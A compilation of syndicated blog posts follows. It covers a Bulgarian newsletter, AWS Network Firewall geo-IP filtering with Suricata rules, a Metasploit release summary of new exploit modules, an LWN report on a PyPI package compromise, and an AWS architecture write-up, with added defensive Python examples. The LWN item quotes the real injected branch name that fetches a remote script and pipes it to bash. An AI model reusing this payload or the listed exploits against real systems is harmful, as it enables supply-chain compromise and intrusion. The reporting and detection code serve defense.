The Week (2–7 December)

Post Syndicated from Боряна Телбис original https://www.toest.bg/sedmitsata-2-7-dekemvri/

May the sophisticated readers of Toest forgive me for opening this week's newsletter like this, but I want to return to an urban legend. A Pernik urban legend, to be precise. It is said (I have not seen it with my own eyes, but many people have) that at the stadium of Minyor (Pernik), better known as the Stadium of Peace, there was once written: D*CK FOR THE PEOPLE. In large, legible letters on one of the walls by the stands.

And before you run off, quite rightly disgusted by this vulgarity, stay a moment so I can explain why I am telling you this.

Imagine how desperate the lyrical hero must have been to raise such an enormous middle finger to all of humanity and to want to immortalize it with an inscription on a wall. So that everyone who enters the stadium and takes their seat in the stands would see it and feel that hopelessness.

Now be honest with yourselves and quietly, privately admit whether, as we kick along the latest "historic and unprecedented moment" we are passing through collectively as a society, you don't occasionally feel like giving vent to your feelings like the unknown hero from Pernik. It need not be with those words. It need not be an inscription on a wall. It is even advisable that it be neither with those words nor in such a place, but a person sometimes has to shake a fist at the void and threaten it, to ask it: "Is this it? Is this all we can do? Is there any way for things to be different?" And when these questions hang over all our heads, when we start cramming them onto buses, going to bed with them, walking into restaurants with them and raising toasts while they dance on our heads, then we will find the communal strength to want to answer them.

And through the answers, change will creep in.

Until then we will quietly tuck in our children in the evening and find in their faces consolation for everything we have heard on the news. We will convince ourselves that our reason is still sound, that not everything is lost. Never mind that in an EU country in the 21st century there are hospitals and maternity wards operating on a rotating basis. Never mind that we are once again collecting money for "Bulgarian Christmas", a campaign that is an admission of the state's utter helplessness in healthcare. Never mind that half of Bulgaria has no normal running water because "the snow was melting slowly" (?!). Never mind that yet another woman's life is in danger after a severe beating inflicted by the man she has lived with as a family for 20 years.

Never mind.

What matters is that, after a first sitting that lasted 26 days, parliament now has a Speaker: Natalia Kiselova.

The choice was obviously not easy, and between the votes all sorts of interesting things became clear, for example that a person can be principled, but without overdoing it. Yavor Bozhankov apparently had not understood that and kept voting according to his conscience, for which PP demanded his resignation. Svetla Encheva's text this week, "The Constant Yavor Bozhankov", is devoted precisely to this case.

The crisis in the state helped the protest in the Velingrad area, which aimed to save 1,760 sheep from being euthanized, to end in success. Evidently neither the Ministry of the Interior nor the Ministry of Agriculture and Food has the forces or the desire to intervene and impose the will of the state by force. Not that we haven't seen the Interior Ministry do exactly that by the columns of the Council of Ministers, for example.

It is simply not the right time now. Emilia Milcheva reflects on the topic in her text "In the Battle for Power, the Sheep Won".

To some extent also about the battle for power, but seen more globally, is Milena Deleva's piece "Europe for Europeans, Bulgaria for Bulgarians, America for Americans?". Milena makes her debut in Toest with reflections on xenophobia, racism, antisemitism and Islamophobia.

One more new author appears on the pages of the outlet this week. Martin Dimov launches our collaboration with "Екипът на София" (The Sofia Team) in a column in which we will discuss a wide variety of urban topics. In "How Hard It Is to Be a Condominium. And How It Could Be Otherwise", Martin explains what can be done to make it easier for all of us to live alongside one another.

Our shared coexistence gets somewhat easier during holiday periods, perhaps because then we are more inclined to be kinder to one another, or simply because we are not on the premises of the condominium. Either way, the holidays are approaching and we ought to know how to exchange greetings correctly. Pavlina Varbanova's language column comes to the rescue, this week bearing the dizzying title "We Are Not Sinless, but We Are Christmassy".

We have one more text from a regular monthly column, on molecular biology, in Toest this week. In her piece "On Science's Fight Against HIV", Anastasia Ormandzhieva examines the enormous efforts and remarkable scientific achievements thanks to which HIV therapy exists today. Anastasia tells us about the history of the disease as well as its mechanism and treatment options.

We close the week with a wonderful "On Second Reading" by Stefan Ivanov. It is about the book by the Portuguese writer Gonçalo M. Tavares, "Mateo Lost His Job".

I remembered that Marin Bodakov had talked to me about this book. But I had forgotten that he had also talked about it in a video. It took me two hours to force myself to play it. It was hard for me. The window stayed open, but I just didn't press play. I didn't know how I would react when I heard and saw him again, since there is no way for that to happen again in my life in flesh and blood. One of those things, coincidences, synchronicities, that knock you off the rails and knock you out.

I leave you with this excerpt from Stefan's text and wish you coincidences that put you in your place.

If you like the work of the Toest team, we would be glad if you supported us, because our outlet is sustained entirely and solely by reader donations.

Friday Squid Blogging: Safe Quick Undercarriage Immobilization Device

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2024/12/friday-squid-blogging-safe-quick-undercarriage-immobilization-device.html

Fifteen years ago I blogged about a different SQUID. Here’s an update:

Fleeing drivers are a common problem for law enforcement. They just won’t stop unless persuaded—persuaded by bullets, barriers, spikes, or snares. Each option is risky business. Shooting up a fugitive’s car is one possibility. But what if children or hostages are in it? Lay down barriers, and the driver might swerve into a school bus. Spike his tires, and he might fishtail into a van—if the spikes stop him at all. Existing traps, made from elastic, may halt a Hyundai, but they’re no match for a Hummer. In addition, officers put themselves at risk of being run down while setting up the traps.

But what if an officer could lay down a road trap in seconds, then activate it from a nearby hiding place? What if—like sea monsters of ancient lore—the trap could reach up from below to ensnare anything from a MINI Cooper to a Ford Expedition? What if this trap were as small as a spare tire, as light as a tire jack, and cost under a grand?

Thanks to imaginative design and engineering funded by the Small Business Innovation Research (SBIR) Office of the U. S. Department of Homeland Security’s Science and Technology Directorate (S&T), such a trap may be stopping brigands by 2010. It’s called the Safe Quick Undercarriage Immobilization Device, or SQUID. When closed, the current prototype resembles a cheese wheel full of holes. When open (deployed), it becomes a mass of tentacles entangling the axles. By stopping the axles instead of the wheels, SQUID may change how fleeing drivers are, quite literally, caught.


AWS Network Firewall Geographic IP Filtering launch

Post Syndicated from Prasanjit Tiwari original https://aws.amazon.com/blogs/security/aws-network-firewall-geographic-ip-filtering-launch/

AWS Network Firewall is a managed service that provides a convenient way to deploy essential network protections for your virtual private clouds (VPCs). In this blog post, we discuss Geographic IP Filtering, a new feature of Network Firewall that you can use to filter traffic based on geographic location and meet compliance requirements.

Customers with internet-facing applications are constantly in need of advanced security features to protect their applications from threat actors. This includes restricting traffic to and from their workloads in Amazon Web Services (AWS) to certain geographies because of security risk. Customers operating in highly regulated industries—such as banking, public sector, or insurance—might have specific security requirements that can be addressed by Geographic IP Filtering.

Previously, customers had to rely on third-party tools for retrieving an IP address list of specific countries and updating their firewall rules on a regular basis to meet applicable requirements. Now, with Geographic IP Filtering on Network Firewall, you can protect your application workloads based on the geolocation of the IP address. As new IP addresses are assigned by the Internet Assigned Numbers Authority (IANA), the Geographic IP database underneath Network Firewall is automatically updated so that the service can consistently filter inbound and outbound traffic from specific countries based on country codes. It supports IPv4 and IPv6 traffic.

Geographic IP Filtering is supported in all AWS Regions where Network Firewall is available today, including the AWS GovCloud (US) Regions.

Set up Geographic IP Filtering in Network Firewall

You can use Network Firewall to inspect network traffic and protect your VPCs using layer 3–7 rules (network layer to application layer of the OSI model). When traffic reaches Network Firewall, it will identify the location of the source and destination IP address from the Geographic IP database and block traffic if you have a firewall rule to block that location. You can choose to pass, drop, reject, or create an alert for traffic coming from or going to specific countries.

Before setting up Geographic IP Filtering rules, you need to deploy Network Firewall and attach a firewall policy. You can learn more about these steps in the Network Firewall Getting Started guide. You can configure Network Firewall Geographic IP Filtering in minutes using the AWS Management Console, AWS Command Line Interface (AWS CLI), AWS SDK, or the Network Firewall API.

To configure Geographic IP Filtering rules using the console:

  1. Sign in to the AWS Management Console and open the Amazon VPC console.
  2. In the navigation pane, under Network Firewall, choose Network Firewall rule groups.
  3. Choose Create rule group.
  4. In the Create rule group page, for the Rule group type, select Stateful rule group.
  5. For the Rule group format, select Standard stateful rule.
  6. For Rule evaluation order, select either Strict order (recommended) or Action order.
  7. Enter a name for the stateful rule group.
  8. For Capacity, enter the maximum capacity you want to allow for the stateful rule group.
  9. Under Standard stateful rules, for Geographic IP Filtering, select whether you want to Disable Geographic IP filtering, Match only selected countries, or Match all but selected countries.
  10. If you opt for Geographic IP Filtering, then select the Geographic IP traffic direction and Country codes that you want to filter the traffic for.
  11. Enter the appropriate values for Protocol, Source, Source port, Destination, and Destination port.
  12. For Action, select the action that you want Network Firewall to take when a packet matches the rule settings.

    Figure 1: Standard stateful rule

  13. Click Add rule and then review the rule to create the rule group.

    Figure 2: Geographic IP Filtering rules

Suricata compatibility

You can also use Geographic IP filtering with Suricata-compatible rule strings using the geoip keyword.

To create a Suricata compatible rule string:

  1. Follow steps 1 through 4 of the previous procedure.
  2. For the Rule group format, select Suricata compatible rule string.
  3. For Rule evaluation order, select either Strict order (recommended) or Action order.
  4. Enter a name for the stateful rule group.
  5. For Capacity, enter the maximum capacity you want to allow for the stateful rule group.
  6. Under Suricata compatible rule string, enter an appropriate string based on your source and destination along with the country code to filter traffic for. To use a Geographic IP filter, provide the geoip keyword, the filter type, and the country codes for the countries that you want to filter for.
  7. Suricata supports filtering for source and destination IPs. You can filter on either of these types by itself, by specifying dst or src. You can filter on the two types together with AND or OR logic, by specifying both or any.

For example, the following sample Suricata rule string drops traffic originating from Japan:

drop ip any any -> any any (msg:"Geographic IP from JP,Japan"; geoip:src,JP; sid:55555555; rev:1;)

Note that Suricata determines the location of requests using MaxMind GeoIP databases. MaxMind reports very high accuracy of their data at the country level, although accuracy varies according to factors such as country and type of IP. For more information about MaxMind, see MaxMind IP Geolocation.

If you think any of the Geographic IP data is incorrect, you can submit a correction request to MaxMind at MaxMind Correct GeoIP Data.

Logging Geographic IP Filtering

You can configure Network Firewall logging for your firewall’s stateful engine to get detailed information about the packet and any stateful rule action taken against the packet. There are no changes to the logging and monitoring mechanism with the introduction of the Geographic IP Filtering feature. However, by explicitly specifying the msg and metadata keywords, you can see additional geographic information in the alert logs that can help with troubleshooting. If these keywords aren’t specified in the Suricata rule string, the log event will not show any geographic information.

Suricata rule examples

In this section, you will find examples of Suricata rule strings to pass, block, reject, and alert on traffic to or from a specific country.

Example 1: To pass ingress traffic from a specific country

The following example passes ingress traffic from India.

Note: The rule evaluation order should be set to Strict for alert logs to be generated in this example. If the rule evaluation order is set to Action, then although the traffic will pass, alert logs will not be generated.

alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"Ingress traffic from IN allowed"; flow:to_server; geoip:src,IN; metadata:geo IN; sid:202409301;)
pass ip $EXTERNAL_NET any -> $HOME_NET any (msg:"Ingress traffic from IN allowed"; flow:to_server; geoip:src,IN; metadata:geo IN; sid:202409302;)

The following are the alert and flow logs for Example 1.

Alert logs:

{
    "firewall_name": "Test-NFW",
    "availability_zone": "eu-north-1a",
    "event_timestamp": "1731102856",
    "event": {
        "src_ip": "13.127.20.X",
        "src_port": 56630,
        "event_type": "alert",
        "alert": {
            "severity": 3,
            "signature_id": 202409301,
            "rev": 0,
            "metadata": {
                "geo": ["IN"]
            },
            "signature": "Ingress traffic from IN allowed",
            "action": "allowed",
            "category": ""
        },
        "flow_id": 234143298308779,
        "dest_ip": "172.31.2.4",
        "proto": "TCP",
        "verdict": {
            "action": "pass"
        },
        "dest_port": 80,
        "pkt_src": "geneve encapsulation",
        "timestamp": "2024-11-08T21:54:16.972019+0000",
        "direction": "to_server"
    }
}

Flow logs from source to destination:

{
    "firewall_name": "Test-NFW",
    "availability_zone": "eu-north-1a",
    "event_timestamp": "1731102918",
    "event": {
        "tcp": {
            "tcp_flags": "13",
            "syn": true,
            "fin": true,
            "ack": true
        },
        "app_proto": "unknown",
        "src_ip": "13.127.20.X",
        "src_port": 56630,
        "netflow": {
            "pkts": 4,
            "bytes": 216,
            "start": "2024-11-08T21:54:16.972019+0000",
            "end": "2024-11-08T21:54:17.263030+0000",
            "age": 1,
            "min_ttl": 112,
            "max_ttl": 112
        },
        "event_type": "netflow",
        "flow_id": 234143298308779,
        "dest_ip": "172.31.2.4",
        "proto": "TCP",
        "dest_port": 80,
        "timestamp": "2024-11-08T21:55:18.257416+0000"
    }
}

Flow logs from destination to source:

{
    "firewall_name": "Test-NFW",
    "availability_zone": "eu-north-1a",
    "event_timestamp": "1731102918",
    "event": {
        "tcp": {
            "tcp_flags": "13",
            "syn": true,
            "fin": true,
            "ack": true
        },
        "app_proto": "unknown",
        "src_ip": "172.31.2.4",
        "src_port": 80,
        "netflow": {
            "pkts": 2,
            "bytes": 112,
            "start": "2024-11-08T21:54:16.972019+0000",
            "end": "2024-11-08T21:54:17.263030+0000",
            "age": 1,
            "min_ttl": 126,
            "max_ttl": 126
        },
        "event_type": "netflow",
        "flow_id": 234143298308779,
        "dest_ip": "13.127.20.X",
        "proto": "TCP",
        "dest_port": 56630,
        "timestamp": "2024-11-08T21:55:18.257449+0000"
    }
}

Example 2: To block ingress traffic from a specific country

The following example blocks ingress traffic from Japan.

drop ip $EXTERNAL_NET any -> $HOME_NET any (msg:"Ingress traffic from JP blocked"; flow:to_server; geoip:any,JP; metadata:geo JP; sid:202409303;)

Example 3: To block ingress SSH traffic from a specific country

The following example blocks ingress SSH traffic from Russia.

drop ssh $EXTERNAL_NET any -> $HOME_NET any (msg:"Ingress SSH traffic from RU blocked"; flow:to_server; geoip:src,RU; metadata:geo RU; sid:202409304;)

Example 4: To reject egress TCP traffic to a specific country

The following example rejects egress TCP traffic to Iran.

reject tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"Egress traffic to IR rejected"; flow:to_server; geoip:dst,IR; metadata:geo IR; sid:202409305;)

Example 5: To alert on traffic originating from or destined to a specific country

The following example alerts on traffic that originates from or is destined to Venezuela (geoip:any matches either the source or the destination).

alert ip any any -> any any (msg:"Geographic IP is from VE, Venezuela"; geoip:any,VE; sid:202409306;)
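As an added example (not code from the AWS post), the following Python builds Suricata geoip rule strings of the form shown in the examples above, always emitting msg and metadata:geo so that the alert log carries the country, and then extracts and summarizes those geographic fields from alert-log records in the JSON shape shown under Example 1. The log records it processes are constructed to mirror the post's sample and are not real traffic.

```python
import json
from typing import Iterable

# Vocabulary from the post: the four Network Firewall actions and the four
# geoip filter types Suricata accepts.
ACTIONS = {"pass", "drop", "reject", "alert"}
GEOIP_TYPES = {"src", "dst", "both", "any"}


def geoip_rule(action: str, countries: Iterable[str], geo_type: str, sid: int,
               protocol: str = "ip", direction: str = "ingress", rev: int = 1) -> str:
    """Build one Suricata rule string using the geoip keyword.

    direction picks the $EXTERNAL_NET/$HOME_NET pair used in the post's examples.
    msg and metadata:geo are always emitted because, as the post notes, the alert
    log carries no geographic fields unless the rule sets them.
    """
    if action not in ACTIONS:
        raise ValueError(f"unsupported action {action!r}")
    if geo_type not in GEOIP_TYPES:
        raise ValueError(f"unsupported geoip type {geo_type!r}")
    if sid <= 0:
        raise ValueError("sid must be a positive integer")
    codes = [c.upper() for c in countries]
    if not codes or any(len(c) != 2 or not c.isalpha() for c in codes):
        raise ValueError(f"expected ISO 3166-1 alpha-2 codes, got {codes!r}")
    if direction == "ingress":
        src, dst = "$EXTERNAL_NET", "$HOME_NET"
    elif direction == "egress":
        src, dst = "$HOME_NET", "$EXTERNAL_NET"
    else:
        raise ValueError(f"unsupported direction {direction!r}")
    joined = ",".join(codes)
    # One "geo XX" metadata entry per country; Suricata logs them as a list.
    metadata = ", ".join(f"geo {c}" for c in codes)
    msg = f"Geo {action} {direction} {protocol} {geo_type} {joined}"
    return (f"{action} {protocol} {src} any -> {dst} any "
            f'(msg:"{msg}"; flow:to_server; geoip:{geo_type},{joined}; '
            f"metadata:{metadata}; sid:{sid}; rev:{rev};)")


def geo_from_alert(log_line: str) -> dict:
    """Pull the responder-relevant fields out of one alert-log record (the JSON
    shape shown in the post). Non-alert records (netflow) yield {}; an alert
    whose rule lacked metadata:geo yields an empty "geo" list."""
    rec = json.loads(log_line)
    ev = rec["event"]
    if ev.get("event_type") != "alert":
        return {}
    alert = ev["alert"]
    return {
        "sid": alert["signature_id"],
        "signature": alert.get("signature", ""),
        "geo": alert.get("metadata", {}).get("geo", []),
        "verdict": ev.get("verdict", {}).get("action"),
        "src_ip": ev["src_ip"],
        "dest_ip": ev["dest_ip"],
        "dest_port": ev["dest_port"],
    }


def summarize_alerts(log_lines: Iterable[str]) -> tuple:
    """Count alerts per country and list the sids of rules that fired without
    metadata:geo (those rules need msg/metadata added to be useful in logs)."""
    by_country: dict = {}
    missing_geo: list = []
    for line in log_lines:
        info = geo_from_alert(line)
        if not info:
            continue
        if not info["geo"]:
            missing_geo.append(info["sid"])
            continue
        for code in info["geo"]:
            by_country[code] = by_country.get(code, 0) + 1
    return by_country, missing_geo


def _record(sid, signature, geo, verdict, event_type="alert"):
    """Constructed log record modelled on the post's sample (not real traffic)."""
    event = {"event_type": event_type, "src_ip": "198.51.100.7",
             "dest_ip": "172.31.2.4", "dest_port": 80, "proto": "TCP"}
    if event_type == "alert":
        event["alert"] = {"signature_id": sid, "signature": signature,
                          "action": "allowed", "severity": 3}
        if geo:
            event["alert"]["metadata"] = {"geo": geo}
        event["verdict"] = {"action": verdict}
    return json.dumps({"firewall_name": "Test-NFW", "event": event})


SAMPLE_LOG = [
    _record(202409301, "Ingress traffic from IN allowed", ["IN"], "pass"),
    _record(202409303, "Ingress traffic from JP blocked", ["JP"], "drop"),
    _record(202409306, "Geographic IP is from VE", [], "pass"),  # no metadata:geo
    _record(0, "", [], None, event_type="netflow"),               # flow record
]

if __name__ == "__main__":
    print(geoip_rule("drop", ["ru"], "src", 202409304, protocol="ssh"))
    print(summarize_alerts(SAMPLE_LOG))
```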

Conclusion

You can use the new Geographic IP Filtering feature in AWS Network Firewall to enhance your security posture by controlling traffic based on geographic locations. In this post, you learned about the key concepts, configuration steps, and examples for implementing the Geographic IP Filtering feature in Network Firewall. By using this feature, businesses can protect their networks from potentially harmful traffic and control which geographic locations can interact with their infrastructure. As cyber threats continue to evolve, the Geographic IP Filtering feature serves as a vital tool for strengthening network security.

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, contact AWS Support.
 

Prasanjit Tiwari

Prasanjit is a Cloud Support Engineer II based out of Virginia, USA. He has a Master of Science in Telecommunications Engineering from the University of Maryland. He is a WAF and Route 53 subject matter expert and enjoys working on networking and perimeter security services. He is enthusiastic about using innovative solutions to address customer challenges.
Dhiren Patel

Dhiren is a Cloud Support Engineer-II based out of Virginia, USA. He has a Master of Science in Electrical and Computer Engineering from New York University. As a WAF and Route 53 subject matter expert, he specializes in AWS networking and security services. He’s passionate about helping customers solve their AWS issues and get the best cloud experience possible through AWS.

Metasploit Weekly Wrap-Up 12/06/2024

Post Syndicated from Christophe De La Fuente original https://blog.rapid7.com/2024/12/06/metasploit-weekly-wrap-up-44/

Post-Thanksgiving Big Release


This week’s release is an impressive one. It adds 9 new modules, which will get you remote code execution on products such as Ivanti Connect Secure, VMware vCenter Server, Asterisk, Fortinet FortiManager and Acronis Cyber Protect. It also includes an account takeover on WordPress, a local privilege escalation on Windows and an X11 keylogger module. Finally, this release improves the fingerprinting logic for the TeamCity login module and adds instructions for installing the Metasploit development environment on Windows using PowerShell to the official documentation. A big thank you to the community for this awesome release!

New module content (9)

WordPress POST SMTP Account Takeover

Authors: Ulysses Saicha and h00die
Type: Auxiliary
Pull request: #19596 contributed by h00die
Path: admin/http/wp_post_smtp_acct_takeover
AttackerKB reference: CVE-2023-6875

Description: The "POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress" plugin for WordPress is vulnerable to unauthorized access and modification of data due to a type juggling issue on the connect-app REST endpoint in all versions up to, and including, 2.8.7. This adds an exploit module which allows an attacker to reset the password of any known user on the system.

X11 Keylogger

Authors: h00die and nir tzachar
Type: Auxiliary
Pull request: #18877 contributed by h00die
Path: gather/x11_keyboard_spy
AttackerKB reference: CVE-1999-0526

Description: This adds a new X11 library and module that uses it to remotely capture key presses from open X servers.

Chamilo v1.11.24 Unrestricted File Upload PHP Webshell

Authors: Ngo Wei Lin and jheysel-r7
Type: Exploit
Pull request: #19629 contributed by jheysel-r7
Path: linux/http/chamilo_bigupload_webshell
AttackerKB reference: CVE-2023-4220

Description: This adds an exploit module for Chamilo LMS where, in versions prior to 1.11.24, a webshell can be uploaded via the bigload.php endpoint, allowing remote code execution in the context of www-data (CVE-2023-4220).

Ivanti Connect Secure Authenticated Remote Code Execution via OpenSSL CRLF Injection

Authors: Christophe De La Fuente and Richard Warren
Type: Exploit
Pull request: #19595 contributed by cdelafuente-r7
Path: linux/http/ivanti_connect_secure_rce_cve_2024_37404
AttackerKB reference: CVE-2024-37404

Description: Adds an exploit module for a CRLF injection vulnerability in Ivanti Connect Secure to achieve remote code execution. Versions prior to 22.7R2.1 and 22.7R2.2 are vulnerable. Ivanti Policy Secure versions prior to 22.7R1.1 are also vulnerable but this module doesn’t support this software. Valid administrative credentials are required. A non-administrative user is also required and can be created using the administrative account, if needed. Also the Client Log Upload feature needs to be enabled. This can also be done using the administrative interface if it is not enabled already.

vCenter Sudo Privilege Escalation

Authors: Matei "Mal" Badanoiu and h00die
Type: Exploit
Pull request: #19402 contributed by h00die
Path: linux/local/vcenter_sudo_lpe
AttackerKB reference: CVE-2024-37081

Description: VMware vCenter Server < 7.0.3 update R and < 8.0.2 update D contains multiple local privilege escalation vulnerabilities due to misconfiguration of sudo. An authenticated local user with non-administrative privileges may exploit these issues to elevate privileges to root on vCenter Server Appliance. This adds a post module to exploit these vulnerabilities.

Asterisk AMI Originate Authenticated RCE

Authors: Brendan Coles, NielsGaljaard, and h00die
Type: Exploit
Pull request: #19613 contributed by h00die
Path: linux/misc/asterisk_ami_originate_auth_rce
AttackerKB reference: CVE-2024-42365

Description: Adds an authenticated RCE module for Asterisk via AMI. This vulnerability is tracked as CVE-2024-42365. This also moves the underlying functionality that enables the module to interact with the Asterisk application, originally written by @bcoles, to a library.

Fortinet FortiManager Unauthenticated RCE

Author: sfewer-r7
Type: Exploit
Pull request: #19648 contributed by sfewer-r7
Path: linux/misc/fortimanager_rce_cve_2024_47575
AttackerKB reference: CVE-2024-47575

Description: Adds a module that exploits a missing authentication vulnerability affecting FortiManager and FortiManager Cloud devices to achieve unauthenticated RCE with root privileges. This vulnerability is being tracked as CVE-2024-47575.

Acronis Cyber Protect/Backup remote code execution

Authors: Sandro Tolksdorf of usd AG and h00die-gr3y
Type: Exploit
Pull request: #19583 contributed by h00die-gr3y
Path: multi/acronis_cyber_protect_unauth_rce_cve_2022_3405
AttackerKB reference: CVE-2022-3405

Description: This exploits an RCE and sensitive information disclosure vulnerability due to excessive privileges assigned to Acronis Agent. The following products are affected: Acronis Cyber Protect 15 before build 29486, Acronis Cyber Backup 12.5 before build 16545.

Windows Access Mode Mismatch LPE in ks.sys

Authors: AngelBoy, jheysel-r7, and varwara
Type: Exploit
Pull request: #19574 contributed by jheysel-r7
Path: windows/local/cve_2024_35250_ks_driver
AttackerKB reference: CVE-2024-35250

Description: This adds a post module to gain NT AUTHORITY\SYSTEM privileges on a Windows target vulnerable to CVE-2024-35250.

Enhancements and features (1)

  • #19684 from sjanusz-r7 – Improves the fingerprinting logic for the auxiliary/scanner/teamcity/teamcity_login module.

Documentation added (1)

  • #19622 from soroshsabz – This improves the Metasploit development environment installation documentation by adding PowerShell instructions for Windows 10 and earlier.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate, and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro.

AI Servers Robot Dogs and Liquid Cooling at the ASUS SC24 Booth

Post Syndicated from Patrick Kennedy original https://www.servethehome.com/asus-sc24-ai-servers-liquid-cooling-cpu-gpu-robot-dog-intel-amd-nvidia/

We take a quick look at some of the unique servers in the ASUS SC24 booth, ranging from AI to storage to dense compute, and even a robot dog.

The post AI Servers Robot Dogs and Liquid Cooling at the ASUS SC24 Booth appeared first on ServeTheHome.

Abusing Git branch names to compromise a PyPI package

Post Syndicated from daroc original https://lwn.net/Articles/1001215/

A compromised release was uploaded to PyPI after a project automatically processed a pull request with a flawed script.
The GitHub account “OpenIM Robot” (which appears to be controlled by Xinwei Xiong) opened a pull request for the ultralytics Python package. The pull request included a suspicious Git branch name:

openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)

Unfortunately, ultralytics uses the
pull_request_target GitHub Action trigger to automate some of its continuous integration tasks. This runs a script from the base branch of the repository, which has access to the repository’s secrets — but that script was vulnerable to a shell injection attack from the branch name of the pull request. The injected script appears to have used the credentials it had access to in order to compromise a later release uploaded to PyPI to include a cryptocurrency miner. It is hard to be sure of the details, because GitHub has already pulled the malicious script.

This problem has been known for several years, but this event may serve as a good reminder to be careful with automated access to important secrets.
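As an added example (not code from LWN, ultralytics or GitHub), the following Python script flags the pattern the article describes: a workflow triggered by pull_request_target whose run: steps interpolate contributor-controlled expressions, such as the head branch name, directly into the shell. Both workflow files are constructed for the example; the hardened variant passes the branch name through an environment variable, which the shell treats as data rather than as code.

```python
import re

# Expression contexts an outside contributor controls through the pull request
# itself (head branch name, title, body, comment text). Interpolating any of
# these into a run: script under pull_request_target, which runs with the base
# repository's secrets, is the injection described in the article.
UNTRUSTED = re.compile(
    r"\$\{\{\s*(github\.head_ref"
    r"|github\.event\.pull_request\.(?:title|body|head\.ref|head\.label)"
    r"|github\.event\.(?:comment|issue|review)\.(?:title|body))\s*\}\}"
)
# Heuristic match for the trigger (block form "pull_request_target:" or the
# flow form "on: [pull_request, pull_request_target]"); a mention inside a
# YAML comment would also match, which is acceptable for a linter.
TRIGGER = re.compile(r"^\s*-?\s*pull_request_target\b|^on:.*\bpull_request_target\b", re.M)
RUN_STEP = re.compile(r"^\s*(?:-\s+)?run:\s*(?P<value>.*)$")


def run_step_lines(text: str):
    """Yield (line_number, content) for every line belonging to a run: step.
    Plain-text scan, so no YAML library is needed; block scalars (| or >) are
    followed by their more-indented continuation lines."""
    lines = text.splitlines()
    i = 0
    while i < len(lines):
        m = RUN_STEP.match(lines[i])
        if not m:
            i += 1
            continue
        value = m.group("value").strip()
        yield i + 1, value
        i += 1
        if value.startswith(("|", ">")):
            indent = len(lines[i - 1]) - len(lines[i - 1].lstrip())
            while i < len(lines) and (
                not lines[i].strip() or len(lines[i]) - len(lines[i].lstrip()) > indent
            ):
                yield i + 1, lines[i]
                i += 1


def find_injections(workflow_text: str) -> list:
    """Return (line_number, expression) pairs for untrusted expressions inside
    run: steps of a workflow that uses the pull_request_target trigger. Other
    triggers are skipped: a plain pull_request run from a fork does not receive
    the repository's secrets, so the same interpolation exposes far less."""
    if not TRIGGER.search(workflow_text):
        return []
    findings = []
    for lineno, content in run_step_lines(workflow_text):
        for m in UNTRUSTED.finditer(content):
            findings.append((lineno, m.group(0)))
    return findings


# Constructed workflow files for the example (not ultralytics' real workflow).
VULNERABLE_WORKFLOW = """\
name: ci
on:
  pull_request_target:
    types: [opened, synchronize]
jobs:
  check:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Report branch
        run: |
          echo "PR from ${{ github.head_ref }}"
          ./ci/check.sh ${{ github.event.pull_request.head.ref }}
"""

HARDENED_WORKFLOW = """\
name: ci
on:
  pull_request_target:
    types: [opened, synchronize]
jobs:
  check:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Report branch
        env:
          HEAD_REF: ${{ github.head_ref }}
        run: |
          echo "PR from $HEAD_REF"
          ./ci/check.sh "$HEAD_REF"
"""

if __name__ == "__main__":
    for name, text in (("vulnerable", VULNERABLE_WORKFLOW), ("hardened", HARDENED_WORKFLOW)):
        print(name, find_injections(text))
```

The check only covers run: steps; expressions fed to an action's with: inputs are a separate review item.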

Efficient satellite imagery supply with AWS Serverless at BASF Digital Farming GmbH

Post Syndicated from Kevin S. Ridolfi original https://aws.amazon.com/blogs/architecture/efficient-satellite-imagery-supply-with-aws-serverless-at-basf-digital-farming-gmbh/

This post was co-written with Dr. Jan Melchior at BASF Digital Farming GmbH and xarvio Digital Farming Solutions.

BASF Digital Farming’s mission is to support farmers worldwide with cutting-edge digital agronomic decision advice by using its main crop optimization platform, xarvio FIELD MANAGER. This necessitates providing the most recent satellite imagery available as quickly as possible. This blog post describes the serverless architecture developed by BASF Digital Farming for efficiently downloading and supplying satellite imagery from various providers to support its xarvio platform.

Screenshot showing the xarvio Field Manager platform

Figure 1. Screenshot showing the xarvio Field Manager platform

Architecture

Figure 2 shows the serverless architecture implemented with AWS services for downloading and processing satellite imagery. The subscription management components handle subscription creation, updates, and deletions, while the actual data downloading and processing occurs in AWS Step Functions.

Serverless implementation of the new imagery service

Figure 2. Serverless implementation of the new imagery service

  1. Subscriptions are created using Amazon API Gateway for external API access, which provides request throttling and can be used to manage API request authorizations.
  2. An AWS Lambda API function manages subscriptions. It implements common create, read, update, and delete operations with request validations and provides an endpoint for replaying failed requests. Subscriptions contain geometry, data provider, as well as start and end date and other parameters, which are stored in the subscription database (Step 7) before a message is sent out for processing.
    Notice that the entire architecture is serverless and thus allows for theoretically unbounded scaling. In case of a bug, this can lead to severe cost impacts, so we implemented a safety buffer, which enables us to prioritize and limit the number of Step Functions executions of the processing pipeline.
  3. All requests (such as the initial request for imagery when a subscription is created) are sent to the Amazon Simple Queue Service (Amazon SQS) processing queue first, which functions as a processing buffer and allows for request prioritization.
  4. Subsequently, Amazon EventBridge Pipes connects the processing buffer with AWS Step Functions. It handles pipe-internal errors automatically; for example, when the Step Functions concurrency limit is reached, the invocation will be retried automatically. This does not handle exceptions raised within Step Functions, such as runtime errors.
  5. AWS Step Functions then performs the actual downloading, processing, and ingestion to the STAC catalog of satellite data from different providers. In case of failure, the request message with error description is sent to the failure queue.
  6. Step Functions uploads the data to Amazon Simple Storage Service (Amazon S3), which stores satellite imagery data.
  7. Following this, Step Functions updates the subscriptions in the Amazon DynamoDB-based subscription database, which stores relevant metadata, such as start and end date, boundary, provider, collection, and last update.
  8. A notification is sent out to inform the user that new data is available through Amazon Simple Notification Service (Amazon SNS), which informs users and services about any updates on a subscription, such as new data being available or subscriptions having been created, deleted, updated, or having failed.
